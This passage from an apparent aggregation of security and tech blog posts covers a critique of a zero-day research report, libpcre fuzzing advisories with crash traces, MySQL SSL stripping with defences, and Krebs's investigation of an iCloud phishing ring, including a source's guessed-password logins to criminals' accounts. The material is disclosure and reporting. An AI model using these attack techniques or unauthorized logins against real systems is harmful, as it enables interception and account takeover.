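large_pool = collision_rate(50_000, 200, 200)   # expected overlap around 0.4%
```

Since the pool size is exactly the quantity nobody knows, a measured overlap between one private dataset and the public record pins down very little about Red.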

So how does this report solve this? Well, let it speak for itself:

Ideally, we would want similar data on Red (i.e., adversaries of Blue, or other private-use groups), to examine the overlap between Blue and Red, but we could not obtain that data. Instead, we focus on the overlap between Blue and the public (i.e., the teal section in the figures above) to infer what might be a baseline for what Red has. We do this based on the assumption that what happens in the public groups is somewhat similar to what happens in other groups. We acknowledge that this is a weak assumption, given that the composition, focus, motivation, and sophistication of the public and private groups can be fairly different, but these are the only data available at this time. (page 12)

Okay, weak assumption may be the understatement of the year. Let's summarize this: They acknowledge that they can't answer the question they want to answer. So they just answer an entirely different question (bug collision rate between the 207 bugs they have data about and what is known in public) and then claim that's about the same. To their credit they recognize that this is a weak assumption, but you have to read the report to learn that. Neither the summary nor the press release nor any of the favorable blog posts and media reports mention that.

If you wonder what the Red and Blue here means, that's also quite interesting, because it gives some insights about the mode of thinking of the authors. Blue stands for the “own team”, a company or government or anyone else who has knowledge of zero day bugs. Red is “the adversary” and then there is the public. This is of course a gross oversimplification. It's like a world where there are two nation states fighting each other and no other actors that have any interest in hacking IT systems. In reality there are multiple Red, Blue and in-between actors, with various adversarial and cooperative relations between them.

Sometimes the best answer is: We don't know

The line of reasoning here is roughly: If we don't have good data to answer a question, we'll just replace it with bad data.

I can fully understand the call for making decisions based on data. That is usually a good thing. However, it may simply be that this is a scenario where getting reliable data is incredibly hard or simply impossible. In such a situation the best thing one can do is admit that and live with it. I don't think it's helpful to rely on data that's so weak that it's basically meaningless.

The core of the problem is that we're talking about an industry that wants to be secret. This secrecy is in a certain sense in direct conflict with good scientific practice. Transparency and data sharing are cornerstones of good science.

I should mention here that shortly afterwards another study was published by Trey Herr and Bruce Schneier which also tries to answer the question of bug collisions. I haven't read it yet, from a brief look it seems less bad than the RAND report. However I have my doubts about it as well. It is only based on public bug findings, which is at least something that has a chance of being verifiable by others. It has the same problem that one can hardly draw conclusions about the non-public space based on that. (My personal tie in to that is that I had a call with Trey Herr a while ago where he asked me about some of my bug findings. I told him my doubts about this.)

The bigger picture: We need better science

IT security isn't a field that's rich in rigorous scientific data.

There's a lively debate going on right now in many fields of science about the integrity of their methods. Psychologists had to learn that many theories they believed for decades were based on bad statistics and poor methodology and are likely false. Whenever someone tries to replicate other studies, the replication rates are abysmal. Smart people claim that the majority of scientific outcomes are not true.

I don't see this debate happening in computer science. It's certainly not happening in IT security. Almost nobody is doing replications. Meta-analyses, trial registrations or registered reports are mostly unheard of.

Instead we have cargo cult science like this RAND report thrown around as “cold hard data” we should rely upon. This is ridiculous.

I obviously have my own thoughts on the zero days debate. But my opinion on the matter here isn't what this is about. What I do think is this: We need good, rigorous science to improve the state of things. We largely don't have that right now. And bad science is a poor replacement for good science.
Top

Docker Image Vulnerability Research

Postby kris via The Isoblog. »

Federacy reports that “24% of the latest Docker images have significant vulnerabilities”.

The report underlines the importance of running your own image building service and your own local registry when deploying Docker and Kubernetes.

And that includes the base operating system images, because the test focused on the ‘latest’ tags of the official base operating system images and the known vulnerabilities in them. It finds last year’s vulnerabilities still present in current images.

In their own words:

[…] we decided to put our technology to work to answer a key question: what is the current state of vulnerabilities in official Docker repositories?

[…] On February 6th, we scanned 91 of the 133 official Docker repositories. This is every repository with a ‘latest’ tagged image consisting of a major linux distribution and a functional package manager.

It also underlines that inspecting images and tracking the versions of what you build on is really important for a functional compliance and security management strategy when using container technology. Packaging, package managers and useful versioning of stuff do not go away at all with containers.
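The core of such a scan is to compare the package versions installed in an image against known fixed-in versions. A minimal sketch of that logic, with entirely hypothetical package data (real scanners parse the image's package manager database and a CVE feed):

```python
# Minimal sketch of version-based vulnerability flagging; package names,
# versions and fix levels are entirely made up for illustration.
installed = {"openssl": (1, 0, 1), "bash": (4, 3, 42)}
fixed_in = {"openssl": (1, 0, 2), "bash": (4, 3, 30)}  # first non-vulnerable version

vulnerable = sorted(pkg for pkg, ver in installed.items()
                    if pkg in fixed_in and ver < fixed_in[pkg])
```

Running this kind of comparison in your own image building pipeline is what lets you catch stale base images before they reach production.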
Top

Network attacks on MySQL, Part 2: SSL stripping with MySQL

Postby Daniël van Eeden via Daniël's Database Blog »

Intro

In my previous blog post I told you to use SSL/TLS to secure your MySQL network connections. So you followed my advice and enabled SSL. Great!

So first let's quickly verify that everything is working.

So you enabled SSL with mysql_ssl_rsa_setup, used an OpenSSL-based build, or put ssl-cert, ssl-key and ssl-ca in the mysqld section of your /etc/my.cnf, and now show global variables like 'have_ssl'; returns 'YES'.

And you have configured the client with --ssl-mode=PREFERRED. Now show global status like 'Ssl_cipher'; indicates the session is indeed secured.

You could also dump traffic and it looks 'encrypted' (i.e. not readable)...

With SSL enabled everything should be safe, shouldn't it?

The handshake which MySQL uses always starts unsecured and is upgraded to secured if both the client and server have the SSL flag set. This is very similar to STARTTLS as used in the SMTP protocol.

To attack this we need an active attack; we need to actually sit in between the client and the server and modify packets.

Then we modify the flags sent from the server to the client to have the SSL flag disabled. This is called SSL stripping.

Because the client thinks the server doesn't support SSL the connection is not upgraded and continues in clear text.

An example can be found in the dolfijn_stripssl.py script.
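The essence of the strip is a single bit: the attacker rewrites the capability flags exchanged during the MySQL handshake so that the SSL capability is no longer advertised. The sketch below uses the real MySQL protocol flag value for CLIENT_SSL (0x0800); the capability word itself is made up, and real stripping of course happens on live packets, as in the script above.

```python
# How SSL stripping works in principle: the MITM clears the SSL capability
# flag in the MySQL handshake. CLIENT_SSL is the real protocol flag value;
# the capability word below is otherwise hypothetical.
CLIENT_SSL = 0x0800

def strip_ssl(capabilities: int) -> int:
    """Clear the SSL capability bit, so the connection is never upgraded."""
    return capabilities & ~CLIENT_SSL

server_caps = 0xFFFF            # hypothetical server capabilities, SSL offered
stripped = strip_ssl(server_caps)

assert server_caps & CLIENT_SSL        # the server did offer SSL...
assert not (stripped & CLIENT_SSL)     # ...but the client will never see that
```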

Once the SSL layer is stripped from the connection an attacker can see your queries and resultsets again as described before.

To protect against this attack:

  1. Set REQUIRE SSL on accounts which should never use unencrypted connections.
  2. On the client use --ssl-mode=REQUIRED to force the use of SSL. This is available since 5.6.30 / 5.7.11.
  3. For older clients: Check the Ssl_cipher status variable and exit if it is empty.
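Point 3 can be sketched as a simple guard in application code. The helper below is hypothetical; the cipher string would be the value returned by SHOW SESSION STATUS LIKE 'Ssl_cipher';:

```python
def assert_encrypted(ssl_cipher: str) -> None:
    """Bail out if the session reports no cipher, i.e. SSL was stripped.
    The value would come from: SHOW SESSION STATUS LIKE 'Ssl_cipher';"""
    if not ssl_cipher:
        raise RuntimeError("connection is unencrypted; refusing to continue")

assert_encrypted("DHE-RSA-AES256-SHA")   # encrypted session: passes silently
```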
Top

Extreme Sports: Racing the Tube

Postby kris via The Isoblog. »

I am the last person to learn about the 2014 extreme sport that is Racing the Tube: leaving a subway car at one station and re-entering the same car at the next station. Like so:

London

Stockholm

Warsaw


Moscow

Hongkong

Top

Tumblr of the Day: Maps on the Web

Postby kris via The Isoblog. »

Maps on the Web, what if every secession was successful?
(only the post above: here)
Top

Kamergotchi

Postby kris via The Isoblog. »

Unfortunately, the game ends tomorrow: in Kamergotchi, the Dutch player has to keep his member of parliament alive.

Kamergotchi, het ideale spel voor de betrokken kiezer. Hou je lijsttrekker zo lang mogelijk in leven door hem eten, aandacht of kennis te geven. Zoveel politieke invloed had je nog nooit!

(Kamergotchi, the ideal game for the engaged voter. Keep your party leader alive as long as possible by giving him food, attention or knowledge. You have never had this much political influence!)

Top

Tumblr of the Day: If Hemingway wrote Javascript

Postby kris via The Isoblog. »

Tumblr of the Day is a Github: angus-c/literary.js.

It is also available as a Kindle Book.


master/book/carroll/prime.js:

function downTheRabbitHole(growThisBig) {
  var theFullDeck = Array(growThisBig);
  var theHatter = Function('return this/4').call(2*2);
  var theDuchess = Boolean("The frumious Bandersnatch!");

  var theVerdict = "the white rabbit".split(/the march hare/).slice(theHatter);

  //into the pool of tears...
  eval(theFullDeck.join("if (!theFullDeck[++theHatter]) {\
      theDuchess = 1;\
      theVerdict.push(theHatter);\
      " + theFullDeck.join("theFullDeck[++theDuchess * theHatter]=true;") + "}")
  );

  return theVerdict;
}
Top

Adobe, Microsoft Push Critical Security Fixes

Postby BrianKrebs via Krebs on Security »

Adobe and Microsoft each pushed out security updates for their products today. Adobe plugged at least seven security holes in its Flash Player software. Microsoft, which delayed last month’s Patch Tuesday until today, issued an unusually large number of update bundles (18) to fix dozens of flaws in Windows and associated software.

Microsoft’s patch to fix at least five critical bugs in the Windows file-sharing service is bound to make a great many companies nervous before they get around to deploying this week’s patches. Most organizations block internal file-sharing networks from talking directly to their Internet-facing networks, but these flaws could be exploited by a malicious computer worm to spread very quickly once inside an organization with many unpatched Windows systems.

Another critical patch (MS17-013) covers a slew of dangerous vulnerabilities in the way Windows handles certain image files. Malware or miscreants could exploit the flaws to foist malicious software without any action on the part of the user, aside from perhaps just browsing to a hacked or booby-trapped Web site.

According to a blog post at the SANS Internet Storm Center, the image-handling flaw is one of six bulletins Microsoft released today which include vulnerabilities that have either already been made public or that are already being exploited. Several of these are in Internet Explorer (CVE 2017-0008/MS17-006) and/or Microsoft Edge (CVE-2017-0037/MS17-007).

For a more in-depth look at today’s updates from Microsoft, check out this post from security vendor Qualys.

And as per usual, Adobe used Patch Tuesday as an occasion to release updates for its Flash Player software. The latest update brings Flash to v. 25.0.0.127 for Windows, Mac and Linux users alike. If you have Flash installed, you should update, hobble or remove Flash as soon as possible. To see which version of Flash your browser may have installed, check out this page.

The smartest option is probably to ditch the program once and for all and significantly increase the security of your system in the process. An extremely powerful and buggy program that binds itself to the browser, Flash is a favorite target of attackers and malware. For some ideas about how to hobble or do without Flash (as well as slightly less radical solutions) check out A Month Without Adobe Flash Player.

If you choose to keep Flash, please update it today. The most recent versions of Flash should be available from the Flash home page. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

Chrome and IE should auto-install the latest Flash version on browser restart, though users may need to manually check for updates and/or restart the browser to get the latest version. When in doubt in Chrome, click the vertical three dot icon to the right of the URL bar, select “Help,” then “About Chrome”; if there is an update available, Chrome should install it then.

Finally, Adobe also issued a patch for its Shockwave Player, which is another program you should probably ditch if you don’t have a specific need for it. The long and short of it is that Shockwave often contains the same exploitable Flash bugs but doesn’t get patched anywhere near as often as Flash. Please read Why You Should Ditch Adobe Shockwave if you have any doubts on this front.

As always, if you experience any issues downloading or installing any of these updates, please leave a note about it in the comments below.
Top

How does the 8008 processor work?

Postby kris via The Isoblog. »

The historic 8008 processor is 45 years old: It was released on the 13th of March 1972. Ken Shirriff has a blog post that explains features of the CPU, from a die photo.

Compared to modern CPUs, the 8008 is weird in multiple ways: the storage for the stack is on-chip instead of in memory, and it is not accessed in linear order, for weird transistor-saving reasons.

Things have changed a lot since then, but back then a central processing unit was usually not a single die but a bunch of discrete electronics on a board. Having enough transistors on a single die to make up a CPU inside a chip was a novel concept.

Die photos and analysis of the revolutionary 8008 microprocessor, 45 years old

Reverse-engineering the surprisingly advanced ALU of the 8008 microprocessor

Analyzing the vintage 8008 processor from die photos: its unusual counters
Top

Ist ja bald Weihnachten: Flying Flame Thrower

Postby kris via The Isoblog. »

In Germany, the Bundesrat has asked for a relaxation (article in German) of the new drone regulations to better accommodate model plane flying as a sport.

Meanwhile, in China, we get flying flame throwers. I want one:

 

Top

Lab::Measurement at the DPG Spring Meeting Dresden 2017

Postby Andreas via the dilfridge blog »

As nearly every year, we'll again present a poster on Lab::Measurement at the spring meeting of the German Physical Society. This time the conference is in Dresden, so visit us on 23 March 2017, 15:00-19:00, poster session TT75, poster TT75.7!
Top

libpcre: invalid memory read in match (pcre_exec.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz of libpcre1 through the pcretest utility revealed an invalid read in the library. For those interested in a detailed description of the bug, the feedback from upstream follows:

This was a genuine bug in the 32-bit library. Thanks for finding it. The crash was caused by trying to find a Unicode property for a code value greater than 0x10ffff, the Unicode maximum, when running in non-UTF mode (where character values can be up to 0xffffffff). The bug was in both PCRE1 and PCRE2. I have fixed both of them.
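The class of bug upstream describes is easy to model: a Unicode property table is sized for code points up to 0x10FFFF, so a lookup with a larger 32-bit character value reads past its end. The Python sketch below is a simplified stand-in for PCRE's staged C tables, not its actual code; it shows the unguarded lookup failing on a huge code value and a bounds-checked version (the shape of the upstream fix) surviving.

```python
MAX_UNICODE = 0x10FFFF
# toy property table indexed by code point (PCRE uses staged C arrays)
prop_table = [0] * (MAX_UNICODE + 1)

def prop_unguarded(c):
    return prop_table[c]          # out-of-bounds read for c > 0x10FFFF

def prop_fixed(c):
    if c > MAX_UNICODE:           # bounds check: huge values get no property
        return 0
    return prop_table[c]

try:
    # in 32-bit non-UTF mode, character values up to 0xffffffff are legal input
    prop_unguarded(0xFFFFFFFF)
    crashed = False
except IndexError:
    crashed = True

assert crashed
assert prop_fixed(0xFFFFFFFF) == 0
```

In C the unguarded read doesn't raise a tidy exception; it reads whatever memory lies past the table, which is what AddressSanitizer flags below.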

The complete ASan output:

# pcretest -32 -d $FILE
==14788==ERROR: AddressSanitizer: SEGV on unknown address 0x7f1bbffed4df (pc 0x7f1bbee3fe6b bp 0x7fff8b50d8c0 sp 0x7fff8b50d3a0 T0)
==14788==The signal is caused by a READ memory access.
    #0 0x7f1bbee3fe6a in match /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:5473:18
    #1 0x7f1bbee09226 in pcre32_exec /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:6936:8
    #2 0x527d6c in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5218:9
    #3 0x7f1bbddd678f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:5473:18 in match
==14788==ABORTING
Affected version:
8.40 and 10.23

Fixed version:
8.41 and 10.24 (not released atm)

Commit fix for libpcre1:
https://vcs.pcre.org/pcre/code/trunk/pcre_internal.h?r1=1649&r2=1688&sortby=date
https://vcs.pcre.org/pcre/code/trunk/pcre_ucd.c?r1=1490&r2=1688&sortby=date

Commit fix for libpcre2:
https://vcs.pcre.org/pcre2/code/trunk/src/pcre2_ucd.c?r1=316&r2=670&sortby=date
https://vcs.pcre.org/pcre2/code/trunk/src/pcre2_internal.h?r1=600&r2=670&sortby=date

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-7186

Reproducer:
https://github.com/asarubbo/poc/blob/master/00204-pcre-invalidread1-pcre_exec

Timeline:
2017-02-23: bug discovered and reported to upstream
2017-02-24: upstream released a patch
2017-03-14: blog post about the issue
2017-03-19: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: invalid memory read in match (pcre_exec.c)

Top

libpcre: NULL pointer dereference in main (pcretest.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

Fuzzing libpcre1 through the pcretest utility revealed a null pointer dereference in the utility itself. Given the nature of the crash, it is not security relevant: the library itself is not affected. But if you have a web application that calls the pcretest utility directly to parse untrusted data, then you are affected.
It is also important to share the details, because some distros/packagers may want to carry the patch in their repositories.

The complete ASan output:

# pcretest -16 -d $FILE
==26399==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000052db1c bp 0x7ffc7de68070 sp 0x7ffc7de67ba0 T0)
==26399==The signal is caused by a READ memory access.
==26399==Hint: address points to the zero page.
    #0 0x52db1b in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5083:25
    #1 0x7f70603bc78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #2 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
https://vcs.pcre.org/pcre/code/trunk/pcretest.c?r1=1685&r2=1686&sortby=date

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
N/A

Reproducer:
https://github.com/asarubbo/poc/blob/master/00195-pcre-nullptr-main

Timeline:
2017-02-22: bug discovered and reported to upstream
2017-02-23: upstream released a patch
2017-03-14: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: NULL pointer dereference in main (pcretest.c)

Top

libpcre: invalid memory read in pchar (pcretest.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

Fuzzing libpcre1 through the pcretest utility revealed an invalid read in the utility itself. Given the nature of the crash, it is not security relevant: the library itself is not affected. But if you have a web application that calls the pcretest utility directly to parse untrusted data, then you are affected.
It is also important to share the details, because some distros/packagers may want to carry the patch in their repositories.

The complete ASan output:

# pcretest -16 -d $FILE
==28444==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3c2de3e2dd (pc 0x0000005409dd bp 0x7fff0423db40 sp 0x7fff0423dac0 T0)
==28444==The signal is caused by a READ memory access.
    #0 0x5409dc in pchar /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:1986:5
    #1 0x54006f in pchars16 /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2115:12
    #2 0x52e3e1 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5092:15
    #3 0x7f3c2dc3878f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
https://vcs.pcre.org/pcre/code/trunk/pcretest.c?r1=1665&r2=1685&sortby=date

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
N/A

Reproducer:
https://github.com/asarubbo/poc/blob/master/00194-pcre-invalidread-phar

Timeline:
2017-02-22: bug discovered and reported to upstream
2017-02-22: upstream released a patch
2017-03-14: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: invalid memory read in pchar (pcretest.c)

Top

Confusing Branding

Postby kris via The Isoblog. »

Top

Nimuno – Lego Tape

Postby kris via The Isoblog. »

Once that is available for regular purchase, I will probably need 10 rolls or so.

Nimuno – Lego Tape
Top

If Your iPhone is Stolen, These Guys May Try to iPhish You

Postby BrianKrebs via Krebs on Security »

KrebsOnSecurity recently featured the story of a Brazilian man who was peppered with phishing attacks trying to steal his Apple iCloud username and password after his wife’s phone was stolen in a brazen daylight mugging. Today, we’ll take an insider’s look at an Apple iCloud phishing gang that appears to work quite closely with organized crime rings — within the United States and beyond  — to remotely unlock and erase stolen Apple devices.

Victims of iPhone theft can use the Find My iPhone feature to remotely locate, lock or erase their iPhone — just by visiting Apple’s site and entering their iCloud username and password. Likewise, an iPhone thief can use those iCloud credentials to remotely unlock the victim’s stolen iPhone, wipe the device, and resell it. As a result, iPhone thieves often subcontract the theft of those credentials to third-party iCloud phishing services. This story is about one of those services.

The iCloud account phishing text that John’s friend received months after losing a family iPhone.
Recently, I heard from a security professional whose close friend received a targeted attempt to phish his Apple iCloud credentials. The phishing attack came several months after the friend’s child lost his phone at a public park in Virginia. The phish arrived via text message and claimed to have been sent from Apple. It said the device tied to his son’s phone number had been found, and that its precise location could be seen for the next 24 hours by clicking a link embedded in the text message.

That security professional source — referred to as “John” for simplicity’s sake — declined to be named or credited in this story because some of the actions he took to gain the knowledge presented here may run afoul of U.S. computer fraud and abuse laws.

John said his friend clicked on the link in the text message he received about his son’s missing phone and was presented with a fake iCloud login page: appleid-applemx[dot]us. A lookup on that domain indicates it is hosted on a server in Russia that is or was shared by at least 140 other domains — mostly other apparent iCloud phishing sites — such as accounticloud[dot]site; apple-appleid[dot]store; apple-devicefound[dot]org; and so on (a full list of the domains at that server is available here).

While the phishing server may be hosted in Russia, its core users appear to be in a completely different part of the world. Examining the server more closely, John noticed that it was (mis)configured in a way that leaked data about various Internet addresses that were seen recently accessing the server, as well as the names of specific directories on the server that were being accessed.

After monitoring that logging information for some time, my source discovered five Internet addresses that communicated with the server multiple times a day, and that those addresses corresponded to devices located in Argentina, Colombia, Ecuador and Mexico.

He also found a file openly accessible on the Russian server which indicated that an application running on the server was constantly sending requests to imei24.com and imeidata.net — services that allow anyone to look up information about a mobile device by entering its unique International Mobile Equipment Identity (IMEI) number. These services return a variety of information, including the make and model of the phone, whether Find My iPhone is enabled for the device, and whether the device has been locked or reported stolen.

John said that as he was conducting additional reconnaissance of the Russian server, he tried to access “index.php” — which commonly takes one to a site’s home page — when his browser was redirected to “login.php” instead. The resulting page, pictured below, is a login page for an application called “iServer.” The login page displays a custom version of Apple’s trademarked logo as part of a pirate’s skull and crossbones motif, set against a background of bleeding orange flames.

The login page for an Apple iCloud credential phishing operation apparently used to unlock and remotely wipe stolen iPhones.
John told me that in addition to serving up that login page, the server also returned the HTML contents of the “index.php” he originally requested from the server. When he saved the contents of index.php to his computer and viewed it as a text file, he noticed it inexplicably included a list of some 137 user names, email addresses and expiration dates for various users who’d apparently paid a monthly fee to access the iCloud phishing service.

“These appear to be ‘resellers’ or people that have access to the crimeware server,” my source said of the user information listed in the server’s “index.php” file.



John told KrebsOnSecurity that with very little effort he was able to guess the passwords of at least two other users listed in that file. After John logged into the iCloud phishing service with those credentials, the service informed him that the account he was using had expired, and he was prompted to pay for at least one more month of subscription access to continue.

Playing along, John said he clicked the “OK” button indicating he wished to renew his subscription, and was taken to a shopping cart hosted on the domain hostingyaa[dot]com. That payment form in turn was accepting PayPal payments for an account tied to an entity called HostingYaa LLC; viewing the HTML source on that payment page revealed the PayPal account was tied to the email address “admin@hostingyaa[dot]com.”

According to the file coughed up by the Russian server, the first username in that user list — demoniox12 — is tied to an email address admin@lanzadorx.net and to a zero-dollar subscription to the phishing service. This strongly indicates the user in question is an administrator of this phishing service.

A review of Lanzadorx[dot]net indicates that it is a phishing-as-a-service offering that advertises the ability to launch targeted phishing attacks at a variety of free online services, including accounts at Apple, Hotmail, Gmail and Yahoo, among others.

A reverse WHOIS lookup ordered from Domaintools.com shows that the admin@lanzadorx.net email is linked to the registration data for exactly two domains — hostingyaa[dot]info and lanzadorx[dot]net [full disclosure: Domaintools is currently one of several advertisers on KrebsOnSecurity].

Hostingyaa[dot]info is registered to a Dario Dorrego, one of the other zero-dollar accounts included near the top of the list of users that are authorized to access the iCloud phishing service. The site says Dorrego’s account corresponds to the email address dario@hostingyaa[dot]com. That name Dario Dorrego also appears in the site registration records for 31 other Web site domains, all of which are listed here.

John said he was able to guess the passwords for at least six other accounts on the iCloud phishing service, including one particularly interesting user and possible reseller of the service who picked the username “Jonatan.” Below is a look at the home screen for Jonatan’s account on this iCloud phishing service. We can see the system indicates Jonatan was able to obtain at least 65 “hacked IDs” through this service, and that he pays USD $80 per month for access to it.

“Jonatan,” a user of this iCloud account credential phishing service. Note the left side panel indicates the number of records and hacked IDs recorded for Jonatan’s profile.
Here are some of the details for “Tanya,” one such victim tied to Jonatan’s account. Tanya’s personal details have been redacted from this image:

This page from the iCloud phishing service shows the redacted account details phished from an iPhone user named Tanya.
Here is the iCloud phishing page Tanya would have seen if she clicked the link sent to her via text message. Note that the victim’s full email address is automatically populated into the username portion of the login page to make the scam feel more like Apple’s actual iCloud site:



The page below from Jonatan’s profile lists each of his 60+ victims individually, detailing their name, email address, iCloud password, phone number, unique device identifier (IMEI), iPhone model/generation and some random notes apparently inserted by Jonatan:



The next screen shot shows the “SMS sent” page. It tracks which victims were sent which variation of phishing scams offered by the site; whether targets had clicked a link in the phony iCloud phishing texts; and if any of those targets ever visited the fake iCloud login pages:



Users of this phishing service can easily add a new phishing domain if their old links get cleaned up or shut down by anti-phishing and anti-spam groups. This service also advertises the ability to track when phishing links have been flagged by anti-phishing companies:



This is where the story turns both comical and ironic. Many times, attackers will test their exploit on themselves whilst failing to fully redact their personal information. Jonatan apparently tested the phishing attacks on himself using his actual Apple iCloud credentials, and this data was indexed by Jonatan’s phishing account at the fake iCloud server. In short, he phished himself and forgot to delete the successful results. Sorry, but I’ve blurred out Jonatan’s iCloud password in the screen shot here:



Can you guess what John did next? Yes, he logged into Jonatan’s iCloud account. Helpfully, one of the screenshots in the photos saved to Jonatan’s iCloud account shows Jonatan logged into the very phishing server that leaked his iCloud account information!



The following advertisement for Jonatan’s service — also one of the images John found in Jonatan’s iCloud account — includes the prices he charges for his own remote iPhone unlocking service. It appears the pricing is adjusted upwards considerably for phishing attacks on newer model stolen iPhones. The price for phishing an iPhone 4 or 4s is $40 per message, versus $120 per message for phishing attacks aimed at iPhone 6s and 6s plus users. Presumably this is because the crooks hiring this service stand to make more money selling newer phones.



The email address that Jonatan used to register on the Apple iPhone phishing service — shown in one of the screen shots above as jona_icloud@hotmail.com — also was used to register an account on Facebook tied to a Jonatan Rodriguez who says he is from Puerto Rico. It just so happens that this Jonatan Rodriguez on Facebook also uses his profile to advertise a “Remove iCloud” service. What are the odds?

Jonatan’s Facebook profile page.
Well, pretty good considering this Facebook user also is the administrator of a Facebook Group called iCloud Unlock Ecuador – Worldwide. Incredibly, Facebook says there are 2,797 members of this group. Here’s what they’re all about:



Jonatan’s Facebook profile picture would have us believe that he is a male model, but the many selfies he apparently took and left in his iCloud account show a much softer side of Jonatan:

Jonatan, in a selfie he uploaded to his iCloud account. Jonatan unwittingly gave away the credentials to his iCloud account because the web site where his iCloud account phishing service provider was hosted had virtually no security (nor did Jonatan, apparently). Other photos in his archive include various ads for his iPhone unlocking service.
Among the members of this Facebook group is one “Alexis Cadena,” whose name appears in several of the screenshots tied to Jonatan’s account in the iCloud phishing service:



Alexis Cadena apparently also has his own iCloud phishing service. It’s not clear if he sub-lets it from Jonatan or what, but here are some of Alexis’s ads:



Coming back to Jonatan, the beauty of the iCloud service (and the lure used by Jonatan’s phishing service) is that iPhones can be located fairly accurately, down to a specific address. And because Jonatan phished his own iCloud account, we can see that, according to his iCloud service, his phone was seen in the following neighborhood in Ecuador on March 7, 2017. The map shows a small radius of a few blocks within Yantzaza, a town of 10,000 in southern Ecuador:

Jonatan’s home town, according to the results of his “find my iphone” feature in iCloud.
Jonatan did not respond to multiple requests for comment.
Top

This month in vc4 (2017-03-13): docs, porting, tiled display

Postby Eric Anholt via anholt's lj »

It's been a while since I've posted a status update.  Here are a few things that have been going on.

VC4 now generates HTML documentation from the comments in the kernel code.  It's just a start, but I'm hoping to add more technical details of how the system works here.  I don't think doxygen-style documentation of individual functions would be very useful (if you're calling vc4 functions, you're editing the vc4 driver, unlike library code), so I haven't pursued that.

I've managed to get permission to port my 3D driver to another platform, the 911360 enterprise phone that's already partially upstreamed.  It's got a VC4 V3D in it (slightly newer than the one in the Raspberry Pi), but an ARM CLCD controller for the display.  The 3D came up pretty easily, but for display I've been resurrecting Tom Cooksey's old CLCD KMS driver that never got merged.  After 3+ years of DRM core improvements, we get to delete half of the driver he wrote and just use core helpers instead.  Completing this work will require that I get the dma-buf fencing to work right in vc4, which is something that Android cares about.

Spurred on by a report from one of the Processing developers, I've also been looking at register allocation troubles again.  I've found one good opportunity for reducing register pressure in Processing by delaying FS/VS input loads until they're actually used, and landed and then reverted one patch trying to accomplish it.  I also took a look at DEQP's register allocation failures again, and fixed a bunch of its testcases with a little scheduling fix.

I've also started on a fix to allow arbitrary amounts of CMA memory to be used for vc4.  The 256MB CMA limit today is to make sure that the tile state buffer and tile alloc/overflow buffers are in the same 256MB region due to a HW addressing bug.  If we allocate a single buffer that can contain tile state, tile alloc, and overflow all at once within a 256MB area, then all the other buffers in the system (texture contents, particularly) can go anywhere in physical address space.  The set top box group did some testing, and found that of all of their workloads, 16MB was enough to get any job completed, and 28MB was enough to get bin/render parallelism on any job.  The downside is that a job that's too big ends up just getting rejected, but we'll surely run out of CMA for all your textures before someone hits the bin limit by having too many vertices per pixel.

Eben recently pointed out to me that the HVS can in fact scan out tiled buffers, which I had thought it wasn't able to.  Having our window system buffers be linear means that when we try to texture from them (your compositing manager's drawing and uncomposited window movement, for example) we have to first do a copy to the tiled format. The downside is that, in my measurements, we lose up to 1.4% of system performance (as measured by memcpy bandwidth tests with the 7" LCD panel for display) due to the HVS being inefficient at reading from tiled buffers (since it no longer gets to do large burst reads).  However, this is probably a small price to pay for the massive improvement we get in graphics operations, and that cost could be reduced by X noticing that the display is idle and swapping to a linear buffer instead.  Enabling tiled scanout is currently waiting for the new buffer modifiers patches to land, which Ben Widawsky at Intel has been working on.

There's no update on HDMI audio merging -- we're still waiting for any response from the ALSA maintainers, despite having submitted the patch twice and pinged on IRC.
Top

r610

Postby Dan Langille via Dan Langille's Other Diary »

I’ve been given a Dell PowerEdge R610. I’ve installed two 30GB SSDs and installed FreeBSD 11 on it. It will become a tape library server. The swap: The zpools: Oh, well, that’s a problem. Let’s fix it: There. Fixed. Just. Like. That.™ The filesystems: And dmesg:
Top

Dahua, Hikvision IoT Devices Under Siege

Postby BrianKrebs via Krebs on Security »

Dahua, the world’s second-largest maker of “Internet of Things” devices like security cameras and digital video recorders (DVRs), has shipped a software update that closes a gaping security hole in a broad swath of its products. The vulnerability allows anyone to bypass the login process for these devices and gain remote, direct control over vulnerable systems. Adding urgency to the situation, there is now code available online that allows anyone to exploit this bug and commandeer a large number of IoT devices.

